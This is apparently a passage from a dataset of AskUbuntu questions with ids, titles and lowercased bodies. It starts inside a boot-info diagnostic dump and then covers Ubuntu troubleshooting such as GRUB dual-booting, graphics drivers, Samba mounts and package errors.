insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 3372315d-d1df-4670-bcbb-4a4ab5548b09 else search -- no-floppy -- fs-uuid -- set=root 3372315d-d1df-4670-bcbb-4a4ab5548b09 fi echo 'carregando linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=3372315d-d1df-4670-bcbb-4a4ab5548b09 ro recovery nomodeset echo 'carregando ramdisk inicial ... ' initrd /boot/initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 8 ( loader ) ( em /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-4664c9eb64c9de35 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 4664c9eb64c9de35 else search -- no-floppy -- fs-uuid -- set=root 4664c9eb64c9de35 fi drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda3/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda3 during installation uuid=3372315d-d1df-4670-bcbb-4a4ab5548b09 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda4 during installation uuid=d5f3ad90-fa34-4a62-9adc-efc3fdd3bfce none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda3 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/grub.cfg 1 = boot/initrd.img-3.8.0-19-generic 1 = boot/vmlinuz-3.8.0-19-generic 1 = initrd.img 1 = vmlinuz 1 =========================== sdb1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` oem install ( for manufacturers ) '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash oem-config/enable=true -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz.efi boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ========================= sdb1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? boot/grub/grub.cfg 1 ================= sdb1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/chain.c32 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdb1 : version of com32 ( r ) files used by syslinux : =============== syslinux/chain.c32 : com32r module ( v4.xx ) syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) =============================== stderr messages : =============================== awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in /home/ubuntu/documents/bootinfoscript : line 1646 : [ : 2.73495e+09 : integer expression expected no volume groups found
283575	i can not run dosbox svn-daum on ubuntu 12.04	i 've got the dosbox svn-duam from its homepage . maybe i have solved the dependency problems , $ ldd ./dosbox linux-gate.so.1 = > ( 0xb776d000 ) libsdl_sound-1.0.so.1 = > /usr/lib/libsdl_sound-1.0.so.1 ( 0xb7707000 ) libasound.so.2 = > /usr/lib/i386-linux-gnu/libasound.so.2 ( 0xb7615000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xb760f000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xb75f4000 ) libsdl-1.2.so.0 = > /usr/lib/i386-linux-gnu/libsdl-1.2.so.0 ( 0xb7559000 ) libpng12.so.0 = > /lib/i386-linux-gnu/libpng12.so.0 ( 0xb752f000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xb7519000 ) libfreetype.so.6 = > /usr/lib/i386-linux-gnu/libfreetype.so.6 ( 0xb747e000 ) libpcap.so.1 = > /usr/local/lib/libpcap.so.1 ( 0xb7442000 ) libsdl_net-1.2.so.0 = > /usr/lib/i386-linux-gnu/libsdl_net-1.2.so.0 ( 0xb743d000 ) libx11.so.6 = > /usr/lib/i386-linux-gnu/libx11.so.6 ( 0xb7309000 ) libgl.so.1 = > /usr/lib/nvidia-current-updates/libgl.so.1 ( 0xb722d000 ) libfluidsynth.so.1 = > /usr/lib/i386-linux-gnu/libfluidsynth.so.1 ( 0xb7167000 ) libphysfs.so.1 = > /usr/lib/libphysfs.so.1 ( 0xb713c000 ) libstdc++.so.6 = > /usr/lib/i386-linux-gnu/libstdc++.so.6 ( 0xb7057000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xb702b000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0xb700d000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xb6e62000 ) libvorbisfile.so.3 = > /usr/lib/i386-linux-gnu/libvorbisfile.so.3 ( 0xb6e58000 ) librt.so.1 = > /lib/i386-linux-gnu/librt.so.1 ( 0xb6e4f000 ) /lib/ld-linux.so.2 ( 0xb776e000 ) libpulse-simple.so.0 = > /usr/lib/i386-linux-gnu/libpulse-simple.so.0 ( 0xb6e4a000 ) libpulse.so.0 = > /usr/lib/i386-linux-gnu/libpulse.so.0 ( 0xb6dfc000 ) libxext.so.6 = > /usr/lib/i386-linux-gnu/libxext.so.6 ( 0xb6de9000 ) libcaca.so.0 = > /usr/lib/i386-linux-gnu/libcaca.so.0 ( 0xb6d1e000 ) libxcb.so.1 = > /usr/lib/i386-linux-gnu/libxcb.so.1 ( 0xb6cfd000 ) libnvidia-tls.so.304.64 = > /usr/lib/nvidia-current-updates/tls/libnvidia-tls.so.304.64 ( 0xb6cf9000 ) libnvidia-glcore.so.304.64 = > /usr/lib/nvidia-current-updates/libnvidia-glcore.so.304.64 ( 0xb4ff3000 ) libglib-2.0.so.0 = > /lib/i386-linux-gnu/libglib-2.0.so.0 ( 0xb4ef9000 ) libjack.so.0 = > /usr/lib/i386-linux-gnu/libjack.so.0 ( 0xb4edb000 ) libsndfile.so.1 = > /usr/lib/i386-linux-gnu/libsndfile.so.1 ( 0xb4e69000 ) libdbus-1.so.3 = > /lib/i386-linux-gnu/libdbus-1.so.3 ( 0xb4e20000 ) libreadline.so.6 = > /lib/i386-linux-gnu/libreadline.so.6 ( 0xb4de6000 ) libvorbis.so.0 = > /usr/lib/i386-linux-gnu/libvorbis.so.0 ( 0xb4dba000 ) libogg.so.0 = > /usr/lib/i386-linux-gnu/libogg.so.0 ( 0xb4db2000 ) libpulsecommon-1.1.so = > /usr/lib/i386-linux-gnu/libpulsecommon-1.1.so ( 0xb4d4d000 ) libjson.so.0 = > /usr/lib/i386-linux-gnu/libjson.so.0 ( 0xb4d45000 ) libslang.so.2 = > /lib/i386-linux-gnu/libslang.so.2 ( 0xb4c25000 ) libncursesw.so.5 = > /lib/i386-linux-gnu/libncursesw.so.5 ( 0xb4bf4000 ) libtinfo.so.5 = > /lib/i386-linux-gnu/libtinfo.so.5 ( 0xb4bd5000 ) libxau.so.6 = > /usr/lib/i386-linux-gnu/libxau.so.6 ( 0xb4bd1000 ) libxdmcp.so.6 = > /usr/lib/i386-linux-gnu/libxdmcp.so.6 ( 0xb4bca000 ) libpcre.so.3 = > /lib/i386-linux-gnu/libpcre.so.3 ( 0xb4b8e000 ) libflac.so.8 = > /usr/lib/i386-linux-gnu/libflac.so.8 ( 0xb4b3f000 ) libvorbisenc.so.2 = > /usr/lib/i386-linux-gnu/libvorbisenc.so.2 ( 0xb49c7000 ) libwrap.so.0 = > /lib/i386-linux-gnu/libwrap.so.0 ( 0xb49bd000 ) libasyncns.so.0 = > /usr/lib/i386-linux-gnu/libasyncns.so.0 ( 0xb49b6000 ) libnsl.so.1 = > /lib/i386-linux-gnu/libnsl.so.1 ( 0xb499c000 ) libresolv.so.2 = > /lib/i386-linux-gnu/libresolv.so.2 ( 0xb4983000 ) but when i run it , $ ./dosbox dosbox version svn-daum copyright 2002-2011 dosbox team , published under gnu gpl . gui : press ctrl-f10 to capture/release mouse , alt-f10 for configuration . config : loading primary settings from config file dosbox.conf ./dosbox : symbol lookup error : ./dosbox : undefined symbol : sdl_getdesktopmode what 's wrong with it ? i have n't tried to run it on other linux distributions . but it 's perfect on windows .
283576	using samson gtrack usb mic on ubuntu	welcome , i want anyone help me to make my new usb mic works on ubuntu . mic : samson gtrack , ubuntu 12.10
283581	switch between normal and 10-feet interface	sometimes when i watch a movie or tv episode on my computer , i 'd like to sit on my couch . now sometimes you want to check some random fact being mentioned on wikipedia , or someone writes to me via instant messaging . i do n't want to get up , my mouse & keyboard are wireless , but the fonts are just to small to see . in firefox , you can at least ctrl++ , but that is no help in skype or pidgin . is there a quick way to switch between normal & enlarged fonts , possibly even buttons & icons etc. ? btw . i 'm using xmonad , but i 'm open to other suggestions if need be .
283588	fatal error : no screens found after update	my ubuntu 12.04 asked for some update and after the update , i can not boot ( purple screen ) . in recovery mode the error is : no screens found . unfortunately i do not know how to undo the update . the xorg.0.log files says : loadmodule : vbe ... vesa ( 0 ) : v_bios adress 0xd00 out of range unloadmodule : vesa unloadsubmodule : int10 unloading int10 unloadsubmodule : vbe unloading vbe screen found , but none have a usable configuration fatal server error : no screens found i did n't tipped everthing , but i hope this helps . i 'm really glad , if someone can help me . thank you very much , jonas
283593	problem with lightdm or do not understand upgrade and/or dist-upgrade ( 13.04 )	i will preface that i am very new ubuntu and linux as a whole . i have been tinkering with various things in ubuntu the past couple days namely the apt-get upgrade and apt-get dist-upgrade commands . now i understand that these are updating various things that are used in the background and even remove unneeded things ( in the case of the dist-upgrade that is ) when i upgrade or dist-upgrade whenever i start or restart my laptop lightdm seems to not start . i have no other dms installed at the moment . what i mean by not start the sound of the computer has finished booting is played ( the drum noise ) , my cursor comes up but is just a blank black screen . i can press ctrl + alt + f1 and stop lightdm and start it again and use the laptop fine but something tells me when i upgrade something is being broken . now i am well aware that this ubuntu release ( raring ring tail 13.04 ) is in beta but should n't an `` upgrade '' improve things ? or am i misunderstanding something all together about those commands . or have i stumbled upon a bug inside of lightdm and should post my findings somewhere . if needed i can post the various logs in /var/log/lightdm for further interpretation .
283596	how to restore windows 8 uefi after deleting ubuntu partition ?	i bought a fujitsu with pre-installed windows 8 . i wanted to dual boot ubuntu as i had done on my previous windows 7 laptop . i followed some guides and managed to install it , with the grub boot manager ( using boot repair ) . however i have decided to sell the laptop and needed to remove ubuntu , i followed some guide which told me to delete the partition in windows , then use the recovery disk to restore the windows boot manager . it did n't work . i am now left with a laptop i need to fix in 48 hours and no clue how to do it . i tried re-installing ubuntu but after restarting it still loads up grub recovery . how do i restore the windows boot manager ? i have seen some guides but people say things like mount esp - but do n't explain how to do it - i do n't have a clue how !
283597	how do i uninstall adobe reader ?	i have recently downloaded adobe reader for linux from their website and run it using dpkg -i ... ... i actually downloaded i386 version and my laptop is 64-bit . it then gave an error as : package management system damaged . i searched on this website and fixed it using sudo apt-get -f install . then the adobe reader got installed . but now i want to uninstall it . i tried running : sudo apt-get remove adobereader-enu sudo apt-get autoremove adobereader-enu but it was of no use . i went to the home folder and removed .adobe folder ( this was hidden ) . but still it did n't get uninstalled . i manually tried to remove the .config files of adobe , even then it was not uninstalled . how can i get rid it ? ( this topic is similar to other threads , but i tried the methods given in those threads , but i could n't uninstall the reader ) .
283599	why wont the kde login show up ?	why is the unity login still on ubuntu if i installed kde plasma overlay on it . i 've gone through all the settings and cant get it to not use unity . when i go to the login screen it remembers that i want kde plasma . i really like the kde login . thanks
283607	installing nvidia driver ubuntu 12.04	i downloaded this driver from the nvidia website : nvidia-linux-x86-310.44.run how do i install this file ?
283611	bluetooth problem on lubuntu 12.04.2 lts ?	i 'm new to linux and am having terrible difficulty getting my bluetooth devices to pair/connect . i 'm using a bluetooth dongle on my dell inspiron 910 running lubuntu 12.04.2 lts . i 've tried blueman bluetooth manager and bluetooth-applet ( which i think came preinstalled with ubuntu ) but both crash my system whenever i attempt to pair/connect devices . i do n't fully understand it at this point but i 've read that there is a problem with the bluez package/stack . there does n't seem to be much support availbable the subject . at this point i 'm completely unsure as to what package i should be using for bluetooth functionality or what packages i need to have installed/uninstalled . if you could point me in the right direction i 'd be very greatful . i recently bought a logitech k810 keyboard which i can only stare at for the moment .
283613	turning off battery management on desktop	just installed ubuntu 12.04 on a dell optiplex gx280 desktop computer . when i hook up my bluetooth mouse and keyboard it seems to recognize their batteries as the actual battery of the computer . as if the desktop were a laptop and it had to worry about the battery levels . ubuntu will only stay running for a couple minutes , then i get an error about the battery level being critically low and it goes into suspend mode . i have already tried changing the value in gconf-editor of the critical battery action to `` nothing '' , but this does n't seem to work . the computer still shuts down , which is extremely anoying . is there anyway to turn off the power manager for the batteries or delete the critically low monitor ?
283617	ubuntu 12.04 lts alongside windows 8 ?	i have windows 8 ( 32 bit ) in my pc . i 'm a newbie in ubuntu and wanted to install it using a bootable usb stick . now , when i clicked `` restart to continue '' to install ubuntu alongside windows 8 , my pc restarts and windows 8 starts again . if i try again to boot from usb the installation procedure starts back again . is there any way to run ubuntu 12.04 lts ( 32 bit ) alongside windows 8 without creating new partition ? will be grateful if i get help .
283619	how to boot into windows 7 after install ubuntu ?	my computer had windows 7 . then i installed ubuntu . but after the installation i can only go to ubuntu .
283621	ubuntu 12.10 does n't load	i have a problem with ubuntu on my laptop . my laptop went into hibernation , but i could n't log back on , i had to unplug my laptop to restart ubuntu . my boot menu loads normally and shows ubuntu and previously installed windows 7 . i try to run ubuntu , but it does n't load , it shows the ubuntu pic , but then it goes black and does n't reach the login page . i tried using a live cd and used the boot repair software , i tried loading ubuntu , but it still did n't load . this is the link the repair gave me : boot-info i was wondering someone could help me out , i do n't have great knowledge about ubuntu , but it seems a bit strange it suddenly wo n't load , this is the first time i had a problem ?
283622	store cookies with webkit ( python )	so i was watching the `` create your first ubuntu app '' -video from jono bacon and got the idea , to create a simple app . that creates a window with a webview und opens the url to google keep . everything is fine , i now just need to store cookies for authentication , i googled a little , but since i am not familiar with python i could n't get it working . here is the part with the webview . does anyone know how i can get this to store cookies now ? thanks for the help !
283623	ubuntu server 12.04 error	i have been attempting to install ubuntu server 12.04 . after the boot screen , i just get continuous scrolling messages that wo n't stop , along the lines of : [ # # # . # # # # # # ] ehci_hcd 0000:00:13.2 port 2 resume error -110 i 've been digging for a solution , but the closet thing i could find had something to do with usb . i disabled onboard usb , but this had no effect on it . i can not get to a prompt or stop the scrolling messages using any commands . any advice ?
283624	`` apt-get -f install '' not working	reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libsdl-ttf2.0-0 libunistring0 : i386 python-numpy python-pygame deluge-gtk libsdl-mixer1.2 libgomp1 : i386 liblapack3gf deluge-common libmikmod2 libcroco3 : i386 libgettextpo0 : i386 libblas3gf libgfortran3 libsmpeg0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-generic the following packages will be upgraded : linux-generic 1 upgraded , 0 newly installed , 0 to remove and 212 not upgraded . 1 not fully installed or removed . need to get 0 b/1,722 b of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.37.45 ) ; however : version of linux-image-generic on system is 3.2.0.40.48. linux-generic depends on linux-headers-generic ( = 3.2.0.37.45 ) ; however : version of linux-headers-generic on system is 3.2.0.40.48. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
283627	how to setup deja-up ( backup ) with `` copy '' cloud service ?	i have ubuntu 13.04 beta2 and am wondering how to setup deja-dup to synch directly the selected folders with the `` copy '' cloud service ( and others ) . any idea ? i guess you have to use the custom location but have no clue about the address ... thanks !
283635	mounting samba share with root priveleges 12.10	how to permanently mount samba share with root priveleges ? i 've used this faq but still getting the same error . the point is i do n't want to send credentials in plane text . user credentials file : username=user password=password domain=sanctuary smb.conf : [ global ] valid users = user browsable = yes guest ok = no read only = no available = yes public = no writable = yes comment = ush security = user workgroup = sanctuary create mask = 0777 directory mask = 0777 unix password sync = yes [ share ] comment = archive path = /share directory mask = 0777 create mask = 0777 fstab line : fstab : //192.168.1.50/share /media/share cifs credentials=/etc/samba/user , rw , uid=user , iocharset=utf8 , user , noauto , file_mode=0777 , dir_mode=0777 0 0 error : mount : wrong fs type , bad option , bad superblock on //192.168.1.50/share , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) in some cases useful info is found in syslog - try dmesg | tail or so from connect to server menu in nautilus share mounts fine and dandy , but ... again no root . update : after simplifying a line in fstab to fstab //192.168.1.50/share /media/share cifs credentials=/etc/samba/user , uid=1000 , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 i get the error : mount : only root can mount //192.168.1.50/share on /media/share update 2 actually i got share mounted with : sudo apt-get install cifs-utils but i still can not write inside it - is says permission denied update 3 solved source of proublem was messed up/non-tweaked permissions execute sudo chmod 777 /share on server helped .
283637	how to customize grub	i am dual booting windows 8 with ubuntu 12.10 . the default grub looks okay but i would like to change the order of the boot and customize it . please help as i am a newbie and do not have much experience with ubuntu or any other linux distributions .
283640	libgl error : failed to load driver : i965	hi i just installed the amd propietary driver for my hp pavilion dv6 with switchable graphics with xubuntu 12.10 . everything seems to work fine but games does n't load good and if i use the command : libgl_debug=verbose fglrxinfo i get this errors : libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/i965_dri.so libgl error : dlopen /usr/lib/i386-linux-gnu/dri/i965_dri.so failed ( /usr/lib/i386-linux-gnu/dri/i965_dri.so : wrong elf class : elfclass32 ) libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/i965_dri.so libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/gerard/.drirc : no such file or directory . libgl error : failed to load driver : i965 libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/swrast_dri.so libgl error : dlopen /usr/lib/i386-linux-gnu/dri/swrast_dri.so failed ( /usr/lib/i386-linux-gnu/dri/swrast_dri.so : wrong elf class : elfclass32 ) libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl error : failed to load driver : swrast display : :0.0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6700m series opengl version string : 1.4 ( 2.1 ( 4.2.12173 compatibility profile context 12.10.17 ) ) thanks for your help . edit 1 : maybe this will help : locate i965_dri.so /usr/lib/i386-linux-gnu/dri/i965_dri.so /usr/lib/x86_64-linux-gnu/dri/i965_dri.so i do n't understand the `` -1 '' in my question i only ask questions as my last alternative . edit 2 : i tried to reinstall the drivers and now i get this error in one of the steps : gerard @ gerard-hp-pavilion-dv6 : ~ $ sudo apt-get -y install fglrx-updates fglrx-amdcccle-updates reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : python-keybinder use 'apt-get autoremove ' to remove it . the following new packages will be installed : fglrx-amdcccle-updates fglrx-updates 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/93.0 mb of archives . after this operation , 279 mb of additional disk space will be used . ( reading database ... 184985 files and directories currently installed . ) unpacking fglrx-updates ( from ... /fglrx-updates_2 % 3a12.100.3-0~andrik1_amd64.deb ) ... one or more files have been altered since installation . uninstall will not be completed . see /etc/ati/fglrx-uninstall.log for details . dpkg : error processing /var/cache/apt/archives/fglrx-updates_2 % 3a12.100.3-0~andrik1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 selecting previously unselected package fglrx-amdcccle-updates . unpacking fglrx-amdcccle-updates ( from ... /fglrx-amdcccle-updates_2 % 3a12.100.3-0~andrik1_amd64.deb ) ... errors were encountered while processing : /var/cache/apt/archives/fglrx-updates_2 % 3a12.100.3-0~andrik1_amd64.deb e : sub-proces /usr/bin/dpkg returned an error code ( 1 )
283648	grub not showing windows partition	my mom has a windows partition and a ubuntu 12.04 partition on her laptop , and we wanted to set grub to automatically load windows for ease of use . to do this i used steps from this question : http : //askubuntu.com/questions/66070/how-to-set-windows-bootloader-as-default-bootloader the third answer ( a two part tutorial ) were the steps i had her follow , and now the windows partition is not showing in the grub . i used update-grub and i got an error message after it showed some of the partitions ; can not find a grub drive for dev/sda1check your device.map . so i 'm thinking that when she went through the steps of the tutorial she didnt notice that and when she went through with the other steps it messed something up . that or the tutorial is what ultimately created the problem . so i have no idea how to make the ubuntu partition reappear as a selection in the grub menu ( i think it has grub version 1.99 if that helps any ) *update* i used a tool found on ubuntu 's help section that fixed the issue . here is a link to the tool i used .
283649	wireless not working - need driver for realtek rtl8723ae	already tried wireless card realtek rtl8723ae-bt is not recognized but does n't work past step 4 i am new to ubuntu so please help me ! ! : )
283650	corsair h100i cooler and ubuntu / linux	the corsair h100i cooler fans run at 2300+ rpm under linux . unfortunately , corsair link , only works in windows and lm-sensors / fancontrol do not recognize anything but the pump rpm meaning you ca n't control the speed of the fans . how do you control the speed of the fans under linux ?
283652	ubuntu 12.10 not rebooting after hard shutdown . can not access bios	ubuntu 12.10 not rebooting after hard shutdown . after i suspended my laptop , i tried to wake it up but it did not , when i pressed any of its keys . so i did a forced shutdown . now i am not able to reboot it after pressing the power button . only the numlock and capslock lights blink . not able to access bios also . tried to boot through livecd , but i think it is not at the top of the boot device order . also , my laptop heats up normally . when i remove/insert dvd in the dvd-drive , it makes a normal sound after inserting the cd , which means system is working . but there is no display on the screen . please help . system details : hp pavilion dv6 2005ax amd processor , ati radeon graphics card , 4gb ram ( link below for complete specifications ) http : //h10025.www1.hp.com/ewfrf/wc/document ? docname=c01869762 & tmp_task=prodinfocategory & cc=us & dlc=en & lc=en & product=4039727
283653	folders missing in home using nautilus-root	so i 'm trying to use nautilus-root to move stuff around , specifically moving tarballs to /usr/local/src to make them . but when i run nautilus root , either by making an applications shortcut by using sudo nano /usr/share/applications/nautilus-root.desktop or by simply running gksu nautilus , the folders within `` home '' are not there . i 've checked display hidden files and i 've also used ctrl+d to no avail . i also realize that i can do all this with a sudo cd command and i am while i ca n't use nautilus . but i would like to be able to use the file browser for some stuff , as going back to terminal to do everything that requires root can get a bit old . any suggestions would be much appreciated , thank you in advance .
283654	how to write ubuntu in boot.ini ?	i have windows xp . it has ntldr and boot.ini on multi 0 disk 0 rdisk 0 partition 1 and load windows from multi 0 disk 0 rdisk 0 partition 3 i installed ubuntu 12.10 on second hard drive and i dont know what is partition number that it have . i think something like multi 0 disk 0 rdisk 2 partition 1 or multi 0 disk 0 rdisk 2 partition 3 because i have it parted so : 10 gb , ext4 . ( i think it is main data of ubuntu on it ) 5gb , swap ( swap file ) 85 gb , ext4 ( i think it is like `` my folder '' for files and applications ) 365 gb , ntfs ( part of disk for holding files ) i did it as here ( like sda 5,6,7 ) but with higher volume and also i have same sda 2,3,4 but with another volumes and which are parts of another hard disk : http : //help.ubuntu.ru/_detail/wiki/install_12_10/016.png ? id=wiki % 3ainstall_ubuntu_12_10 also if you need i can give you partition of first drive with windows . but the question is about boot.ini and what i need to write in it to choose ubuntu like second string after my winxp when i turn on computer .
283655	user authenication for ubuntu virtual machine using ubuntu server	i have ubuntu server 12.04 install and i have created 3 virutal machine on it with ubuntu install . what i aim to do is to have users access to the vm remotely , but i want to store all the login information and document on the ubuntu server . but i 'm not sure how to do this .
283658	how to transcode audio files in a batch ?	i 'd use sound converter except it just hangs . it works fine for the odd file or two , but i need to do a lot of files from different directories and it just does n't like it . i 'm searching for all .ogg files and want them transcoding to aac with tags intact . ( i prefer vorbis but slack old sony have n't bothered adding the codec to my car stereo ... ) so is there an alternative ?
283669	is it possible to get marvinsketch to number the atoms in your molecule and if so how ?	i 'd like to be able to create a table displaying different substituents and bonds inside the different members of drug groups like the morphinan opioids and as part of that it would be great if i could create a atom-numbered diagram of morphinan to refer to in said table . i 'd just like to know if it is possible to do this in marvinsketch and , if so , how . i am using marvinsketch 5.12.3 if it is relevant . edit : i would like marvinsketch to automatically number each atom . that is , i would like each atom to be assigned the number it is given when naming in iupac .
283675	will upgrading from 12.10 to 13.04 wipe my hard drive ?	this is not about not being able to upgrade from 12.10 to 13.04 , its about whether upgrading will wipe hard drive or mess up other personal settings . i 've been thinking about upgrading my computer from 12.10 to 13.04 ( mostly because of my shutdown issues ) but been a little bit skeptical . does upgrading wipe your hard drive ? if it does n't , does it mess up your personal settings ? if anyone has anything to help me , please do so asap . i want to know whether or not i should/have to back up my computer on an external hard drive first . thanks in advance .
283678	install line 6 toneport ux1	what am i trying to do ? as the title suggests , i am trying to install the the line 6 toneport ux1 software . what is the problem ? upon reaching the step where i am told to enter sudo apt-get install linux-headers into terminal in this article , i am confronted with the following message ... reading package lists ... done building dependency tree reading state information ... done package linux-headers is a virtual package provided by : linux-headers-3.5.0-27-lowlatency 3.5.0-27.30 linux-headers-3.5.0-26-lowlatency 3.5.0-26.28 linux-headers-3.5.0-25-lowlatency 3.5.0-25.25 linux-headers-3.5.0-24-lowlatency 3.5.0-24.23 linux-headers-3.5.0-23-lowlatency 3.5.0-23.22 linux-headers-3.5.0-22-lowlatency 3.5.0-22.21 linux-headers-3.5.0-21-lowlatency 3.5.0-21.19 linux-headers-3.5.0-18-lowlatency 3.5.0-18.18 linux-headers-3.5.0-27-generic 3.5.0-27.46 linux-headers-3.5.0-27 3.5.0-27.46 linux-headers-3.5.0-26-generic 3.5.0-26.42 linux-headers-3.5.0-26 3.5.0-26.42 linux-headers-3.5.0-25-generic 3.5.0-25.39 linux-headers-3.5.0-25 3.5.0-25.39 linux-headers-3.5.0-24-generic 3.5.0-24.37 linux-headers-3.5.0-24 3.5.0-24.37 linux-headers-3.5.0-23-generic 3.5.0-23.35 linux-headers-3.5.0-23 3.5.0-23.35 linux-headers-3.5.0-22-generic 3.5.0-22.34 linux-headers-3.5.0-22 3.5.0-22.34 linux-headers-3.5.0-21-generic 3.5.0-21.32 linux-headers-3.5.0-21 3.5.0-21.32 linux-headers-3.5.0-19-generic 3.5.0-19.30 linux-headers-3.5.0-19 3.5.0-19.30 linux-headers-3.5.0-18-generic 3.5.0-18.29 linux-headers-3.5.0-18 3.5.0-18.29 